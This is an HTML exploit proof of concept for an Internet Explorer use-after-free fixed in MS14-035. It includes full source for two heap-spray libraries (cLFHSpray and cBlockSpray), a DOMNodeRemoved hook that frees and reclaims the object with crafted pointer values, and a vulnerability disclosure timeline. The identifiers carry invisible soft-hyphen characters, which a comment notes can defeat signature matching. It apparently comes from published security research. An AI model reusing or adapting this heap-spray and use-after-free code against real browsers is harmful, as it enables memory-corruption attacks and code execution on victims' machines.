<meta http-equiv="X-UA-Compatible" content="IE=11">
<script src="c­LFHSpray.js"></script>
<script src="c­Block­Spray.js"></script>
<script>
// Exploit attempt for the use-after-free shown in Repro.html. The author
// states that it may not function; Microsoft fixed the issue in MS14-035.
// NOTE(review): as stored, identifiers in this file contain invisible U+00AD
// (soft hyphen) characters, so signatures that match on plain API names such
// as execCommand will miss this text unless U+00AD is normalised first.
//
// Each pair below is passed to cBlockSpray as (uBlockCount, uChunkCount).
var aau­Copies­And­Sizes = [
[0x08, 0x80],
[0x08, 0x40],
[0x08, 0x20],
[0x10, 0x80]
];
// Base value from which every pointer-sized value written below is derived.
// Presumably the address at which the author expects sprayed data to be
// mapped; nothing in this listing verifies that.
var u­Base­Address = 0x12340000;
var ao­Block­Sprays = new Array(aau­Copies­And­Sizes.length);
for (var i = 0; i < aau­Copies­And­Sizes.length; i++) {
ao­Block­Sprays[i] = new c­Block­Spray(aau­Copies­And­Sizes[i][0], aau­Copies­And­Sizes[i][1]);
// Stores the 32-bit value uBaseAddress + 0x0300 at offset 0x0100 of the
// chunk pattern, which cBlockSpray repeats throughout each block.
ao­Block­Sprays[i].set­Chunk­DWord(0x0100, u­Base­Address + 0x0300);
ao­Block­Sprays[i].spray();
}
// Same capture-phase DOMNodeRemoved hook as in Repro.html.
document.add­Event­Listener("DOMNode­Removed", function () {
// The call that Repro.html marks as the "free" step.
document.open();
// Ten strings sized 0x28, matching the 0x28-byte block named in "Details".
var o­LFHReuse = new c­LFHSpray(10, 0x28);
// The 32-bit fields at offsets 0x10 and 0x14 are set to values inside the
// range based on uBaseAddress. What these fields mean inside the freed
// object is not explained in this file.
o­LFHReuse.set­DWord(0x10, u­Base­Address + 0x0100);
o­LFHReuse.set­DWord(0x14, u­Base­Address + 0x0200);
o­LFHReuse.spray();
}, true);
window.onload = function () {
document.design­Mode="on";
document.exec­Command("Select­All");
document.exec­Command("Delete");
// Not present in Repro.html; the author does not state why editing mode
// is switched off again here.
document.design­Mode="off";
};
</script>
</head>
<body>
</body>
</html>
<!--
########################################################################
c­LFHSpray.js:
// cLFHSpray(uCount, uSize): prepares a string of (uSize - 1) >> 1 UTF-16
// code units and, on spray(), assigns it as the className of uCount newly
// created <span> elements, which are kept alive in this.aoElements.
// "LFH" presumably refers to the Windows low-fragmentation heap; the code
// itself contains nothing specific to it.
function c­LFHSpray(u­Count, u­Size) {
this.ao­Elements = new Array(u­Count);
// Subtraction binds tighter than the shift: length is (uSize - 1) >> 1.
var au­Spray­Chars = new Array(u­Size - 1 >> 1);
for (var i = 0; i < au­Spray­Chars.length; i++) {
// Default fill pattern: for i < 0x80 the low byte is 2*i and the high byte
// is 2*i + 1, so each byte of the buffer holds its own offset.
au­Spray­Chars[i] = ((i & 0x­FF) * 0x202 + 0x100) & 0x­FFFF;
}
// Writes a 32-bit value little-endian as two 16-bit writes.
this.set­DWord = function(u­Offset, u­Value) {
this.set­Word(u­Offset, u­Value & 0x­FFFF);
this.set­Word(u­Offset + 2, u­Value >>> 16);
}
// Writes a 16-bit value little-endian as two byte writes.
this.set­Word = function(u­Offset, u­Value) {
this.set­Byte(u­Offset, u­Value & 0x­FF);
this.set­Byte(u­Offset + 1, u­Value >>> 8);
}
// Replaces one byte of the 16-bit code unit at index uOffset >> 1 and keeps
// the other byte: an even offset changes the low byte, an odd offset the
// high byte.
this.set­Byte = function(u­Offset, u­Value) {
var u­Char­Offset = u­Offset >> 1;
var u­Byte0 = (u­Offset & 1 ? au­Spray­Chars[u­Char­Offset] : u­Value) & 0x­FF;
var u­Byte1 = (u­Offset & 1 ? u­Value : (au­Spray­Chars[u­Char­Offset] >> 8)) & 0x­FF;
au­Spray­Chars[u­Char­Offset] = u­Byte0 + (u­Byte1 << 8);
}
// Builds the string once, then attaches it to uCount elements. The byte
// counts in the two trailing comments are the original author's figures and
// are not derivable from this listing.
this.spray = function() {
var s­Spray­Buffer = String.from­Char­Code.apply(0, au­Spray­Chars);
for (var i = 0; i < u­Count; i++) {
this.ao­Elements[i] = document.create­Element("span"); // allocate 0x34 bytes
this.ao­Elements[i].class­Name = s­Spray­Buffer; // allocate 0x10, u­Size and 0x40 bytes.
}
}
}
########################################################################
c­Block­Spray.js:
// cBlockSpray: an immediately invoked function that builds one shared chunk
// template and returns the constructor cBlockSpray(uBlockCount, uChunkCount).
// An instance assembles one large string ("block") out of uChunkCount
// repetitions of a 0x10000-byte chunk and, on spray(), stores uBlockCount
// strings derived from it in a private array.
var c­Block­Spray = (function() {
var u­Chunk­Size = 0x10000;
// Header and footer sizes are subtracted from the block size below;
// presumably they stand for allocator or string bookkeeping, which this
// listing does not show.
var u­Block­Header­Size = 0x10;
var u­Block­Footer­Size = 0x04;
// Template of uChunkSize / 2 code units: even indices hold the character
// whose code is the index itself, odd indices hold the marker 0xDEAD.
var as­Chunk­Template = new Array(u­Chunk­Size / 2);
for (var u­Index = 0; u­Index < as­Chunk­Template.length; u­Index += 2) {
as­Chunk­Template[u­Index] = String.from­Char­Code(u­Index);
as­Chunk­Template[u­Index + 1] = String.from­Char­Code(0x­DEAD);
}
return function c­Block­Spray(u­Block­Count, u­Chunk­Count) {
// Size in bytes of the string data of one block.
this.u­Block­Size = u­Chunk­Count * u­Chunk­Size - u­Block­Header­Size - u­Block­Footer­Size;
var s­Chunk = as­Chunk­Template.join("");
// sBlock stays undefined until generateBlock() has run.
var s­Block, as­Blocks = new Array(u­Block­Count);
// Writes a 32-bit value into the chunk pattern as two 16-bit words, low
// word first.
this.set­Chunk­DWord = function (u­Offset, u­Value) {
this.set­Chunk­Word(u­Offset, u­Value & 0x­FFFF);
this.set­Chunk­Word(u­Offset + 2, (u­Value >> 16) & 0x­FFFF);
}
// Replaces one code unit of the chunk pattern. Allowed only before the
// block is generated; uOffset is a byte offset that must be even and
// smaller than uChunkSize, otherwise an Error is thrown.
this.set­Chunk­Word = function (u­Offset, u­Value) {
if (s­Block) throw new Error("Cannot set chunk values after generating block");
if (u­Offset & 1) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be Word aligned");
if (u­Offset >= u­Chunk­Size) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be smaller than 0x" + u­Chunk­Size.to­String(16));
var u­Index = u­Offset / 2;
var s­Value = String.from­Char­Code(u­Value & 0x­FFFF);
s­Chunk = s­Chunk.substr(0, u­Index) + s­Value + s­Chunk.substr(u­Index + 1);
}
// Builds the block string once: the first chunk without its first
// uBlockHeaderSize bytes, then the middle chunks, then a last chunk without
// its final uBlockFooterSize bytes. new Array(n).join(s) yields n - 1 copies
// of s, so the middle part holds uChunkCount - 2 full chunks.
this.generate­Block = function () {
if (s­Block) throw new Error("Cannot generating block twice");
s­Block = (
s­Chunk.substr(u­Block­Header­Size / 2) +
new Array(u­Chunk­Count - 1).join(s­Chunk) +
s­Chunk.substr(0, (u­Chunk­Size - u­Block­Footer­Size) / 2)
);
}
// Writes a 32-bit value into the generated block as two 16-bit words, low
// word first.
this.set­Block­DWord = function (u­Offset, u­Value) {
this.set­Block­Word(u­Offset, u­Value & 0x­FFFF);
this.set­Block­Word(u­Offset + 2, (u­Value >> 16) & 0x­FFFF);
}
// Replaces one code unit of the generated block, generating it first if
// needed. uOffset is a byte offset counted from the start of the header, so
// it must be even, at least uBlockHeaderSize and inside the block.
this.set­Block­Word = function (u­Offset, u­Value) {
if (!s­Block) this.generate­Block();
if (u­Offset & 1) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be Word aligned");
var u­Index = (u­Offset - u­Block­Header­Size) / 2;
if (u­Index < 0) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be larger than 0x" + u­Block­Header­Size.to­String(16));
if (u­Index >= s­Block.length) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be smaller than 0x" + (u­Block­Header­Size + s­Block.length * 2).to­String(16));
var s­Value = String.from­Char­Code(u­Value & 0x­FFFF);
s­Block = s­Block.substr(0, u­Index) + s­Value + s­Block.substr(u­Index + 1);
}
// Fills asBlocks with uBlockCount strings derived from sBlock.
// NOTE(review): the concatenate-and-slice form looks intended to make the
// engine produce a separate copy per entry; whether it does is not shown.
this.spray = function() {
if (!s­Block) this.generate­Block();
for (var i = 0; i < u­Block­Count; i++) {
as­Blocks[i] = ("" + s­Block).slice(0);
}
}
}
})();
Time-line
30 December 2013: This vulnerability was submitted to ZDI.
8 January 2014: This vulnerability was acquired by ZDI.
14 January 2014: This vulnerability was disclosed to Microsoft by ZDI.
10 June 2014: This vulnerability was addressed by Microsoft in MS14-035.
20 December 2016: Details of this vulnerability are released.
-->